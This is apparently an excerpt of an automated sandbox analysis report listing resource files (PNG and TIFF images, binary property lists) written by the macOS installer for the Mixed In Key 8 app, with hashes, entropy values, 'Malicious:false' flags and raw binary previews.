                                                                                                    Entropy (8bit):6.9663285201290215
                                                                                                    Encrypted:false
                                                                                                    MD5:7B0C6003481E500C00860F4706DAC5D5
                                                                                                    SHA1:651D3A04CBCA2D881C8D5301F29D94B9CCAF3CC8
                                                                                                    SHA-256:E7C7B33A6BEC672CCEA8F7EB319C1A1021F62AD787A0DE9E26341EE2003DCACC
                                                                                                    SHA-512:1C975BF13E0F9E9BF6A7625E7EBEECCD1F8B1724BF6AA38BA428641220B7B9AE1413435DB963BE7D30D6DFF36E291C9E71B9EF2143A60562A2815B93182CFA72
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: MM.*.....?.@.$....BaP.d6...DbQ8.2....cQ..v=..E..9$.M'.H...d.]..K.S9.jc5.NgR...}?.M..:$..E.Rbtx.U,.0AD.e...E5..4.dR..@AO.....V..ktZ.N....&VX%..W.Z...m>....n...../.[/.......`.........bU...?...mL.>j#_ AW...F...J.....M..j...Q.._..q4M.>.......R..0.Ay..g2...qst..3E...z.%.....i......_..5>9vZ...b.../.....{..?..V..G..........t..$......Kp..."..B0...$....#....:1.G.@."?.+PTR.#.lZ......#....(.... ..\.G....D.B?.7.{...../..2z)..1..#1..u%.....HR"K*!.;..G..G5.M...$..6K.....O..b...#.........Y...)l....s.:..."..+R..R../.....=.-.sHI.....u-?[..Uq]...y_.5..a.4..c....H.V\...........................(.............@...............................................P.............................................(.............%...........0...........8.............(...........1.........h.=...........R...........S.........H.s.....H...v....................................collection-icon@2x.png..tiffutil v310....HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ..............................
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_n1ddej
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 30 x 28, 8-bit/color RGBA, non-interlaced
                                                                                                    Size (bytes):947
                                                                                                    Entropy (8bit):6.324310371336867
                                                                                                    Encrypted:false
                                                                                                    MD5:A476D341C83A84CBE12703A47594278F
                                                                                                    SHA1:F5E846D4D18B7BB83E4B03CBF5BCD04519F8D16E
                                                                                                    SHA-256:5D2838C306D4246EF314A806499BF1CCE54636E526E43769FFC9E3D94C1D68C2
                                                                                                    SHA-512:20C7ECC95D03A9C7D90242886D13E8CD594C185606AF6CAA118C61DD56E86A0CF47EACF57427B572031B4382C2334CB6ED12406AE99F8FCF297AA47095257A3B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR.............v.......gAMA......a.....pHYs................riTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 5.4.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:xmp="http://ns.adobe.com/xap/1.0/">. <tiff:YResolution>72</tiff:YResolution>. <tiff:Compression>5</tiff:Compression>. <tiff:XResolution>72</tiff:XResolution>. <xmp:CreatorTool>Flying Meat Acorn 6.1.3</xmp:CreatorTool>. <xmp:ModifyDate>2018-07-06T14:31:33</xmp:ModifyDate>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>.........IDATH.c`. .H....l...51.c.c`./I.y.61.....".....).&..M.$1.OI..VL..../...`1..Dr..b.. ...b&.E .)O. S..@..,.d..)..X).....z.YLL...64......I.2....5.e#.bF..8%.A..\..?\.h...........[...1...!..?`..3.q....h....T....Q.Q#.....j.......'.....IEND.B`.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_n3EHWE
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 36 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                    Size (bytes):441
                                                                                                    Entropy (8bit):7.335516391981174
                                                                                                    Encrypted:false
                                                                                                    MD5:5AE62011E18E6128AD7BBEB645AA8B7D
                                                                                                    SHA1:2AE91233D93E73601221CD8270B5512BD5F6F558
                                                                                                    SHA-256:EC4AC790718CB25D3D55193A2ACFA791D153639C815876057FE912FD865499CA
                                                                                                    SHA-512:8C5E7D926DA9AAFC7573152FEA992030852110A65558B4F56A66C47950ADF58A305766BAFD383CB2B738583757F38AA2B91321EB45FC4AA8F7C7F1D8B5F36996
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR...$... .....z.......tEXtSoftware.Adobe ImageReadyq.e<...[IDATx...MJ.A..G'G......... z.!kA..........Q.9........L.*..]...K...dQ..R.=.U.Ha..&.Y#....y-.:.\...%;...U.:.....-f........]f..!)x.@....:^%s.k.97C.........mn..uS.s.C...]....4t.F....m.....Cv~......c...H...2......6....L.);.5......!..........U...f...A.x..{.L..g..[&.Y.e.K.>").B.Q..H..]...2....Ku...w...:....h.5t"./....<=C{..S=e.....5CC.X......2...2w..0...)J........IEND.B`.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_nuXRrj
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):8788
                                                                                                    Entropy (8bit):6.648918294266467
                                                                                                    Encrypted:false
                                                                                                    MD5:500F26B00C102FB9526714D61E1DE146
                                                                                                    SHA1:4ADEBC631524E24CB9ACB31C1B0C9217C0595F22
                                                                                                    SHA-256:014ECA7CAB82C3DDAC137A668CAE2552F23D172D803CB307D02200BEDE2D0379
                                                                                                    SHA-512:406C6770582B0E6F09B22DD87673878009B91D4D0E73F45EEABD0D48869B12F6F9368634EC6F2C58AA99A148CB9DAA763BF09623B88D7163B3CDA56710CBF0A8
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top.......Q.......#.$.*...2.8.@.V.d.e.f.k.l.p.u.v.{........................................................... .".%.&.1.2.3.4.8.F.I.J.X.j.......|.....}...~..................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.....>.<.9.O...O.N.P.=.. ...!."[NSClassName...._.(_TtC10MixedInKey22ProgressViewController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.7..4.5.6.....4.'..9.:.;.....=.>.?XNSSource]NSDestinationWNSLabel............A.B.C.D.E.F.G.H.I.J.K.L.M.N.O.P.Q.P.Q.T.UWNSFrameYNSpiFlags_..NSHuggingPriorityZNSMaxValue_. NSDoNotTranslateAutoresizingMask_..NSNextResponder_..NSViewIsLayerTreeHost[NSSuperview]NSNibTouchBarXNSvFlags.....@...#@Y...................W... .X.F.E.J
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_oonNfK
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 88 x 322, 8-bit/color RGBA, non-interlaced
                                                                                                    Size (bytes):1338
                                                                                                    Entropy (8bit):5.082986074392192
                                                                                                    Encrypted:false
                                                                                                    MD5:509E97E4A74A9635BB1A4A3C21E9C99B
                                                                                                    SHA1:739D2F8A58F31963A01BE28BFA4506CE66984398
                                                                                                    SHA-256:EA4659780EE50EBC1A8677CB23F50A358FF138C2B2510BA2A52B21F71C8505B5
                                                                                                    SHA-512:68CE3AFF3295DCF38C52F6868AAE8BEC00D3896025229C0952C2BAE8B474395CB0A35BE42EAD2B5A49B02BAA9C228FA7D864D8B2827A6BD214D6C147F3A247BB
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR...X...B.....u..}....sRGB.........IDATx...1n\e......l.2K.D....V..)R...{A..F.uOI.]0.K.M,.o...8.d.M..t...X._...t}.v]..k]~.|......}..._............_...\.e.y]../......o..i>.y.....'N#.....6"..x.n`....$7.....3.).M...f..xJr.....:....t.o`....$7.....3.).M...f..xJr.....:....t.o`....$7.....3.).M...f..xJr.....:....t.o`....$7.....3.).M...f..xJr.....9...g$.......4....k.........X..?......._/p<\a....;q..S..8?.[..w......O^_/...8>.._.[.........3.\.........X...:.?...g........q.3x.N..........y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y..
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_ozt52e
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):35489
                                                                                                    Entropy (8bit):7.043517952322161
                                                                                                    Encrypted:false
                                                                                                    MD5:DEA9164A8B18E8B7A0D75C7FADC72C18
                                                                                                    SHA1:932B00633CAA7507515DB6AC91A8DCC6D90AEA70
                                                                                                    SHA-256:EF5DB6ED52B9DF52CB2EB1F97431C86CC699A71A680387ECA3D3836FAC6BFD46
                                                                                                    SHA-512:CF33D51FA14020D0478E07A823324C9A69202B49896A0F1685C4D80BC4343F3818015E72DC202422CF6E6B2DA0C87FA5F69B38E859DCA7931203B8316821F2C1
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.j.r.......................................................................................).../.0.5.6.7.<.F.G.H.R.W.X.Y.^._.`.e.o.p.q.{....................................................................................... .%.&.'.,.6.7.8.B.G.H.I.N.O.P.U._.`.a.k.p.q.r.w.x.y.~............................................................................. .%.&.+.,.1.;.<.E.J.K.L.Q.R.S.X.b.c.l.q.r.s.x.y.z.................................................................%.,.0.4.8.;.@.E.H.R.S.T.\.].a.b.e...f.i.j.k.u.v.............................................................................&.../.4.=.H.I.J.O.Y.f.g.h.i.j.k.l.m.v.w...............................................................>................... .$.(.).*./.7.B.C.G.f.g.h.n.}...................................A...................................*.+.,.0.9.:.?.@.H.L.T.Z.`.e.f.k.l.v.z.............................................................#.(.-.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_pjLnwg
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:TIFF image data, big-endian
                                                                                                    Size (bytes):10518
                                                                                                    Entropy (8bit):7.041631894603587
                                                                                                    Encrypted:false
                                                                                                    MD5:BE3A88D0538C9959CFE5651C0189AF71
                                                                                                    SHA1:C224B19DAC4C066EBDF938930DD7936B7D709F54
                                                                                                    SHA-256:8C0D1A65AFCE92DEFCF0CA6B9ABF1E4BABBB437D8CD2A2FA70CBC8FA13729AAC
                                                                                                    SHA-512:C3A3E5306D4D7E47071946C12E0F9F6CCE9B8657DB93A3FC2D091673054856F629C39B1A45EAFD4A6981D413A61A00135268FDD06A5C58DCEF8EF0A96BD521B7
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: MM.*...h.............>.......................,...........,....2016:07:27 02:45:19..?.@.$...g5...d6...Da..*.......X.v=...FB.|....B...d83.4.O.P.E..HAU....E$.I.....:X..`..4.e.5A\..l.K..Jj.b<....V..."b.x...Q......Z.".)..r.....*.....hU.%..y.....c".p..mx.f........(....N...#.y......`..q.....*.....'....g..AG6.(.....g.x......!..**.h.#`.x+...........E.A*0E.~GW..<P.D.......Sl...<.[0...)6..,z.h@ ...7.(.....4......:Jh....(0..)...>/...,E..02p.{..`..p ...q'..P...J.s .B.i..J K...R..K|. .B..RIR.<.".j.(2.....J1...h)D...Z.. .B..1((....i......2..Z.....L...(n.!...m..).........J.=.s..@ ."ZT .r.;... . .B.p....R...l..Hh...h%.../*.\...=N.4..P .M....!p...%,.:.a.... .,.H!.."6....(\...h..e53.!Q#.LD..(#../...c..B.B....F]......aT...0\...e....)"...`d..4..)..]..+........O .........!.~G1...H.ch.Qge..X.&*......? d.0...P.ef..*.......g8V.?.....K.~..!...,k.&p...^....&.... Y.!a.@...%`.L.6.x..Z:...... ............Cd.w.z......`......).....?x9..C...%x....... ........"._k..)...M.aL...:ZmBH)R..x.?. ..o..3..W3...+ .z.b.M...{....
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_smeHYr
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:TIFF image data, big-endian
                                                                                                    Size (bytes):28304
                                                                                                    Entropy (8bit):7.719662646510649
                                                                                                    Encrypted:false
                                                                                                    MD5:FCD681B823514954224FD3013FB51F3E
                                                                                                    SHA1:9A79037AE111D459310245D87A8416BEF2F28685
                                                                                                    SHA-256:6E58D312E8EDB162586BF3247E58F2BE61E7A2BED8A4E2771FD33A172C21FA40
                                                                                                    SHA-512:1721430373DF948C626C75C2A81BC7F37A0EFB1E840FB7B690C9668142FBDC45C8D4755871359ACADA078C2CDCBBF742AAE7C664E7D61227A0F045229E153235
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: MM.*..&... P8...=..@........"Q8.V-..FcQ..v=..HdR9$.M'.JeR.dI...........n+.....}?.PhT:%..G.RiT.e6.O.TjU:.V.W.VkU..v._.XlV;%..g.ZmV.e..o.\nW;...w...P....1.`pX<$.............drY<.W-..fsY..w=..htZ=&.M..juZ.f.]..A....<...nt.......N........ry\.g7...tz]>.W...v{].......{.?% ..Vc.%_/....|~_?.....~._....... @'..z#.....p...b..0.%....-....5....=....D...r....#.}=@<S....e....m....u....|...<.!.q\["I.L.%..l.'....).....H2.....l]-....1..,.3..L.5..jG,...1..2..;....=....?....A.s..4....E..m.G...%I...,.P...D.T.=O...EQ..-MS...Q!..]]W...eY...m[..mU\.Umy_....a..-.c..=wd....g....i....k....l..u.o....q..-.s.....[.....$...]k@.?..<.X....z....|.7......n.`i..+....z5.K.0b8.s.L8N..a..5u`.....!....G.\}.@.J....z..'..j.qe/...p..........?........A`.xD&...Ca...F%..Eb.x........W....|.. ..fU+.Ke....e3.Mf.D....U.A@......?.3zE&".~.@......U..Uz.f.....o..$....+vzP..).....p..<U...{..$.....`@.........&[.....fb..'....{..w=..htZ>cE..S.@Y+qo!....]..e..mv.x....X.w.....('...W.....sy...\.%f..}..f............y|..G....{}... .om..riG....z..
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_uJbK0C
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:TIFF image data, big-endian
                                                                                                    Size (bytes):11030
                                                                                                    Entropy (8bit):7.092290353802276
                                                                                                    Encrypted:false
                                                                                                    MD5:EDB376A5695D51771A8CD8C73596CF70
                                                                                                    SHA1:9CEF62D5C961054036FC404A1FB3F5A395870F0B
                                                                                                    SHA-256:A16F81CF335A2673F56404B910F8D8507B6D76B2B01FC642766E6C55224D91B0
                                                                                                    SHA-512:977DCE12F8C7B906D87573356C403F47385C95ABCB594254610D46B1D6787B2C2DADA0BB788B0C8EF40F8343D6F1348FEC081440EF4CD8E538E583BDEE4C0BC4
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: MM.*...J.............>.......................,...........,....2016:07:27 02:44:58..?.@.$....BaP.d6...DbQ8......cQ..v=....l..~M...HPQ..I..AB......nAY.U...'..FB.<..#.....M"_.,AJ.Qm2&......T..G..)TX...C.R..T...VwA].Q5Y/.?R.rjE....Ao.8. ..O....(.8...)N.BV.j.c ..#..b.,0..$..........._..)G.5<...B.T..gSK.YpZMTB.......(.r.D...a.....A9.E.+....#.k...H[AI8.o>....,..+.....V..T;..8MC..$I!X..o...>.{....j..Ah)Z...S...n...)...W9njLd .c>...C...P...>.A......=$........W..*-.......H(...jQ|...!....Lc........b.:..j.....,.Cr<;.<.JI. ...%)E...'.I...k0t........(6...P.6..<....:.lAPb.&.E... ...O.C.. ...P.C....i...A.B.l.........7.......J.\)...J..B.).S..g........B...).Y!...b#...8W4.x.L.j8...t....D....5...*Q..$.....F..n......."......A..Z.5....I.h)x...P..Qh%.{O0..k.....a.....*@T...0.....6.EH%...jP..GH!....M..C.n_...P..U.%T..2.5... ....P..Ph%..[J...Rr.ok..P..lh&....RW.eu...!.....h(........h-...JV..). .z..:..(c...!%.....K....P;.e|...!.j.z)....q.H..../h..JQ.....Sp....p"JD2.T.!.........Q..L...{)@_`.ch`V...Av...f......>
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_vPmGdz
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 522 x 266, 8-bit/color RGB, non-interlaced
                                                                                                    Size (bytes):13253
                                                                                                    Entropy (8bit):7.920478173918639
                                                                                                    Encrypted:false
                                                                                                    MD5:35359050B19B48F8BE2E292C2A37A449
                                                                                                    SHA1:B757272931E76F039A4809D9DCEA3F549AC99A8E
                                                                                                    SHA-256:8A7BF4643E1E49F7E53FB6F3ACCE5B693B4F265391EE703579CE61323CC38C90
                                                                                                    SHA-512:92B044DF93E94F5C6708CDB1DB2D47C4C5C7A8D335BEC6A6179D9F0A6FCC8CFF80C9742038DC2A35B15325D42AAA1FF337D1F54605048C2FCE11BB4696238204
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR..............K......iCCPICC Profile..H.c`.>.XP.......WR.........~................|.p.o...A.e].Y..a..).......@...... {...\^R.b_..E....._.......;..f.....r..U.l.$....N..]@...t..L!..lBy).y.......|...)....@5:... .. [..60...MLVHO.N..L*JM-J..@.!...!.!.A.!.!.!.....%1..y.@2............_PY...Q.....T...d=..#.C..A..Q.e.8^...!.*....O..`.B,\..a..0.. ..........$...A.gd<..@...c(`.:....$.....[p<......./$...,.(.J,L....T..sY;........*.W.R+V...G.B.\g..;}M...IF....*....Z,..h..F.......a..%..."..n.....=7x..~...O._#.*.'(&8;.".9.7|Z....Qk.7.l..../~_....I.....L=.v .@....Y.........#.{...ME.....(]\6.|f..................F.&.f...V.6..../;.w......gbo}_n.....f.T&.L.;...k..O_?c...YE.c.x.5.'7.s...w.._.q..%.Ks....[...o..U.V.[.v..u...6.o..$.....[.o]..g{.......w...p.....u..>.}P........Y{..X.q..Z'9N>?u...3.gc.Y..?.....k.u\N..pU...k.....q3...m........^....&.y..xt...'%O}..?gx~......R^...y....ws..........s..|....M....g.,.Y.............._...............k.........:.....s.X..X;.f`.p``.V.L..p..P..?.4/.....?C!.l..
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_vTm60J
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 56 x 56, 8-bit/color RGBA, non-interlaced
                                                                                                    Size (bytes):2160
                                                                                                    Entropy (8bit):7.898414881972223
                                                                                                    Encrypted:false
                                                                                                    MD5:781CB2090B079031C608C0EDFF628A26
                                                                                                    SHA1:9A4114A762607A9FA34F356EE0F7523B188C17A5
                                                                                                    SHA-256:F5E9605AEDCA0134AAD16B2FEB441D4E163C106855457AFBC7F2183B80B31831
                                                                                                    SHA-512:CA54CBA0D89AC2B9530D1698BDE4F616E763E0F73CF98CB82B799B73DE05D613547B52BE8920E048A7A1688CD8274DBFD98259AFBAB661EC86E39787ED090222
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR...8...8.......;.....iCCPICC Profile..x..T.k.A..6n..".Zk..x."IY.hE.6..bk....E.d3I.n6..&......*.E......z.d/J.ZE(..(b..-..nL.....~..7.}ov...r.4......R..il|Bj......A4%U..N$.A.s.{..z..[V.{.w.w........@.G..*...q.Y...<..).t.......9Nyx...+=.Y"|@5-..M.S.%.@.H8..qR>.......inf....O......b..N......~N..>.!....?F......?.a.....=..5..`.....5.._.M'.Tq.......V.J.p.8.da.sZHO.Ln....}&....wVQ.y..g....E...0.......HP.E.a..P@.<.14.r?#....{2u$j.tbD.A{6.=.Q..<.("q.C....A.*..O.y..\..V........;..........sM^|..v.WG..yz....?.W.1..5..s...-_...)....U..K.uZ17..l.;=......s...7V..g.jH......U.O^...g..c.)1&v..!.......K...`m.....).m..$.``.../]?[x.F...Q....T....*d4...o...........(./l....mSq...e.ns.....}..nk.~8..X<...R5. ...v.z..).....9R.,.....bR.P.CRR.%.eK...Ub.v....n..9B...Je........R...R.~N.....o...E.x.....=IDATh..[[N.1.m.|.Iw.....:. .*..X.e...PV.].....bV.t..+h.y...=.83~Ll*ai......~.3....~HY...........K...@...*.>L..._ZZ....S.s,... A===.B.....G.O..q....R.]......g..X.(.JOnooYw*..nnn..I....d5^H".G777.X."V.Q.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_xek7gy
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 36 x 36, 8-bit/color RGBA, non-interlaced
                                                                                                    Size (bytes):559
                                                                                                    Entropy (8bit):7.483323322503398
                                                                                                    Encrypted:false
                                                                                                    MD5:5380EBE31A48AD7A056836C7A524562F
                                                                                                    SHA1:44EA8FB34D4D99E6106FBBC397B1D0A2A1C63B88
                                                                                                    SHA-256:EACA04DF83B1722C80CDA74061F069497AF4298E72B1622B0B6BD76DD7676D1A
                                                                                                    SHA-512:8CED57661DFE4B2A6C3AB38AE54DF5F9FBFFC1137F3839833AF26F898601E813FB59158C4EB6DDE03503155D9455D45B773010F43A0712F5155378EE2E34BAEF
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR...$...$.............tEXtSoftware.Adobe ImageReadyq.e<....IDATx....m.0.E...0.7(... ..n..m'.:...d...a............w...../..N....Yy..@y.#\..>.....=.......n.^U....5....~.>...@y...S...Cr...... G..]...n...U..I.C.32}pq.w../0U.v.)....l..m.@..P.Y).h.R.&..`P.....J....6....S..4j..,.fTk.q\..&...{...6.MZa..9...&..i..../........M..Mb......ZdI...-r......2!..`.]...Q...[G...%.k.<x...09QA8..%...P9....h%S-.....B.).+&X.T|...^x.!.V.A...s..d5/...x@.?A..?/t..\....R..@H(I..J.:Z...j%..`.......An....ENi..H.u+ )...@"......re.+@..Z...:...'[...`..fa.zp{.....IEND.B`.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_yTQEkJ
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 26 x 28, 8-bit/color RGBA, non-interlaced
                                                                                                    Size (bytes):859
                                                                                                    Entropy (8bit):5.955378503717219
                                                                                                    Encrypted:false
                                                                                                    MD5:24F24522DBDD5E42203717CCDD010AA6
                                                                                                    SHA1:13ABB1B088A7D44D52F2FD5C583931CFFBF9BC4C
                                                                                                    SHA-256:73970EC5284D412D9DFCAD026F49C77281B7C7E1BBE8FA5CAD926C21F3AB8143
                                                                                                    SHA-512:8C1F7E559EDA4E374E0BF2CB540F0646F073543D1BBDB7AD110B9F88266DACDBF265E9B53782EE3840ECB79E546F27CA5F5922A73137C0E6D166B9EDF070A2B6
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR.....................gAMA......a.....pHYs................riTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 5.4.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:xmp="http://ns.adobe.com/xap/1.0/">. <tiff:YResolution>72</tiff:YResolution>. <tiff:Compression>5</tiff:Compression>. <tiff:XResolution>72</tiff:XResolution>. <xmp:CreatorTool>Flying Meat Acorn 6.1.3</xmp:CreatorTool>. <xmp:ModifyDate>2018-07-06T14:32:15</xmp:ModifyDate>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>.:i.x....IDATH.cd.......=...0..t$..-rdHTd.c...Hj@L.... ..z.-B3...Q........:x..&.xP....:RC...{.%*:.U..$P]t...Tq.&..."$..b.ZDvH....A.8.Z..A..]........IEND.B`.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_zoG8WY
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 190 x 50, 8-bit/color RGBA, non-interlaced
                                                                                                    Size (bytes):66119
                                                                                                    Entropy (8bit):4.393937973533494
                                                                                                    Encrypted:false
                                                                                                    MD5:D5A3896C6B2E8A350AA85D3AD4C5F9E7
                                                                                                    SHA1:889B0E418D806FF5863943E166F8DEE5CA6E17F6
                                                                                                    SHA-256:F1B6F4BA0DB72699CF5BA8107B6EFD68A40820C4D92E16C048970B58F53DB0AC
                                                                                                    SHA-512:23AB267E1F14ADF3D061771AEB151CB36685B6DA24BF11F6F6A7185534BF7BF6A823D38DC397F0E753DC4893274B1F063F2470D2EFECB4717AAB33230786C4F3
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR.......2.......a>....pHYs...%...%.IR$....OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE...........Q,......!.........{.k........>...........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-...."bb.....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<......$.2].G......L......b...G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt.......o..(...h...w..?.G.%..fI.q..^D$.T..?....D..*.A....,.........`6.B$..B.B.d..r`)..B(....*`/.@.4.Qh..p...U..=p..a...(....A...a!...b.X#......!.H...$ ...Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6....h...>C.0....3.l0...B.8,..c.."......V.....c..w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_zpz2YL
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 32 x 44, 8-bit/color RGBA, non-interlaced
                                                                                                    Size (bytes):997
                                                                                                    Entropy (8bit):6.383790587992289
                                                                                                    Encrypted:false
                                                                                                    MD5:EE63E57C9E09D01292FEBD1174F070A6
                                                                                                    SHA1:30ED4218A21D092AB5F0BFDE1C5BFB2083629D23
